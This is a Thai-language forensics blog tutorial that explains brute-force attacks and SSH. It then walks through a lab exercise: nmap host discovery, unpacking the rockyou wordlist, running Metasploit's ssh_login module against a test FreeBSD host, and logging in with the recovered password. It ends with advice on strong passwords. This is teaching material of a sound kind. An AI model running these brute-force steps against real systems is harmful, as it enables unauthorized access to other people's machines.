Digital Forensics: Brute Force Attack SSH

Digital Forensics: Brute Force Attack SSH

Brute force Attack เป็นการเดา password ทุกความเป็นไปได้ของตัวอักษรในแต่ละหลัก เช่น รหัส ATM มีจำนวน 4 หลัก แต่ละหลักสามารถตั้งค่าตัวเลข 0-9 ดังนั้น โปรแกรมจะทำการไล่ตัวเลขจาก 0000 ไปจนถึง 9999 หมื่นวิธีจนได้ password ที่ถูกต้อง

ดังนั้นเพื่อป้องกันภัยเหล่านี้จึงควรตั้ง password ให้มีความซับซ้อนเพิ่มมากยิ่งขึ้น โดย password ที่ดีไม่ควรเป็นคำศัพท์อยู่ใน dictionary และยาวอย่างน้อย 8 ตัวอักษร ผสมตัวพิมพ์ใหญ่ ตัวเลข และเปลี่ยนเป็นประจำอย่างน้อยทุกๆ เดือน นั่นเอง เครดิตข้อมูล http://bit.ly/2qqcTHc 

การทำ Brute Force Attack คือการสุ่มรหัสผ่าน “ทุกความเป็นไปได้” จนกว่าจะเจาระบบได้ โดยเริ่มจากรหัสผ่านที่ ง่ายก่อน อาชญากรจะใช้โปรแกรมที่ทำงานอัตโนมัติในการสุ่ม และอาจใช้คอมพิวเตอร์ของผู้อื่นที่ตนสามารถควบคุมได้จากทางไกล (หรือที่เราเรียกว่าเครื่องคอมพิวเตอร์ “ซอมบี้”) ในการช่วยสุ่มเพื่อให้สามารถเจาะระบบได้เร็วขึ้น วิธีป้องกันคือตั้งรหัสผ่านที่แข็งแรง เครดิตข้อมูล บรรยายสาธารณะ “กระบวนการแสวงหาและพิสูจน์พยานหลักฐานดิจิทัลเชิงเทคนิค”

Secure Shell (SSH) คือ โพรโทคอล (Protocol) ที่ใช้ในการติดต่อสื่อสารระหว่างเครื่องคอมพิวเตอร์บนระบบเครือข่ายผ่าน พอร์ท (Port) หมายเลข 22 ซึ่งโพรโทคอล SSH มีวัตถุประสงค์หลักเพื่อให้ผู้ใช้งานสามารถเข้าควบคุมหรือสั่งการเครื่อง คอมพิวเตอร์ที่ให้บริการ SSH ตามสิทธิของผู้ใช้งานซึ่งได้มาจากการพิสูจน์ตัวตนด้วยการล็อกอิน (Login) ด้วยการใช้ชื่อผู้ใช้และรหัสผ่าน โดยผ่านช่องทางการสื่อสารที่มีการรักษาความมั่นคงปลอดภัยด้วยการเข้ารหัสลับ ข้อมูล (Encryption)  เครดิตข้อมูล thaicert.or.th 

    ในทางการพิสูจน์หลักฐานผู้สืบสวนควรศึกษาวิธีการและเครื่องมือที่ใช้งานเพื่อประโยชน์ในการค้นหาหลักฐาน

สิ่งที่ต้องเตรียมในการทดสอบการโจมตีระบบโดยช่องทางSecure Shell (SSH)

 - nmap เป็นโปรแกรมที่ใช้ในการสแกนตรวจสอบเครื่องคอมพิวเตอร์และอุปกรณ์ในระบบเครือข่าย โดยรายละเอียด  IP Address , port, service, os  เป็นต้น

 - wordlists คือไฟล์ที่รวบรวม รหัสต่างไว้ เช่น ตัวเลข รหัสผ่าน  ข้อมูล password จากที่ต่างไว้สำหรับทดสอบ

 - Kali   คือระบบปฏิบัติการณ์ลินุกซ์ (Linux) ที่ใช้สำหรับทดสอบระบบ  โดยใช้ Metasploit  คือตัวโปรแกรมที่ใช้ในการทดสอบการเจาะระบบ(Penetration Testing) 

 - FreeBSD เครื่องคอมพิวเตอร์ เป้าหมายที่ถูกทดสอบการโจมตี 

Step 1

- nmap –sn 192.168.233.0/24

IP ทำการตรวจสอบ IP address ของเครื่องก่อน

Nmap –sn 192.168.233.0/24  ตรวจสอบ IP address ในเครือข่ายทั้งหมด

ผลลัพธ์ที่ได้ พบเครื่องคอมพิวเตอร์ เป้าหมายที่ถูกทดสอบมี IP 192.168.233.133  เปิดบริการพอร์ท  22 ssh

Step 2

- บน Kali ทำการเตรียม wordlists Rockyou

ls -l /usr/share/wordlists/

cd /usr/share/wordlists/

gunzip rockyou.txt.gz  ทำการแตกซิป

Step 3

- Kali   ใช้โปรแกรม Metasploit

#Msfconsole

search ssh_login

use auxiliary/scanner/ ssh ssh_login

show options 

• msf auxiliary(ssh_login) > set PASS_FILE /usr/share/wordlists/rockyou.txt 
•         msf auxiliary(ssh_login) > set RHOSTS 192.168.233.133
•         msf auxiliary(ssh_login) > set STOP_ON_SUCCESS true
•         msf auxiliary(ssh_login) > set threads 8
•         msf auxiliary(ssh_login) > set USERnAME elizabeth
•         msf auxiliary(ssh_login) > set verbose true
•         msf auxiliary(ssh_login) > run

Success เมื่อพบรหัสผ่านก็จะแสดงตามหน้าจอด้านล่าง

- FreeBSD 192.168.233.133  หน้าจอแสดงเครื่องเป้าหมายที่ถูกทดสอบการโจมตี Brute Force Attack SSH  พบว่ามีการพยายาม login และรหัสผิดหลายครั้ง

Step 4

- บน Kali  ให้ใช้งาน SSH  ทำการนำ  user และ password ที่ได้ไป login ระบบ

  #ssh elizabeth@192.168.233.133

สรุป

จากจำลองเหตุการณ์ว่ามีการโจมตีไปในระบบ โดยวิธี Brute Force Attack ผ่านทาง SSH พบว่าการตั้ง password  ง่ายทำให้โดนโจมตีได้ง่ายและ โดนเดารหัสได้ง่าย  แนะนำวิธีการตั้งรหัสผ่านที่ปลอดภัย

ที่มา:  metasploit-unleashed/scanner-ssh-auxiliary-modules/

#WINDOWSFORENSIC #COMPUTERFORENSICS #DFIR #FORENSICS #DIGITALFORENSICS #COMPUTERFORENSIC #INVESTIGATION #CYBERCRIME #FRAUD #หลักสูตรการพิสูจน์หลักฐานทางดิจิทัล

หมายเหตุ:เนื้อหาในเว็บไซต์นี้มีขึ้นเพื่อวัตถุประสงค์ในการให้ข้อมูลและเพื่อการศึกษาเท่านั้น

* หากมีข้อมูลข้อผิดพลาดประการใด ขออภัยมา ณ ที่นี้ด้วย  รบกวนแจ้ง ADMIN เพื่อแก้ไขต่อไป
ขอบคุณครับ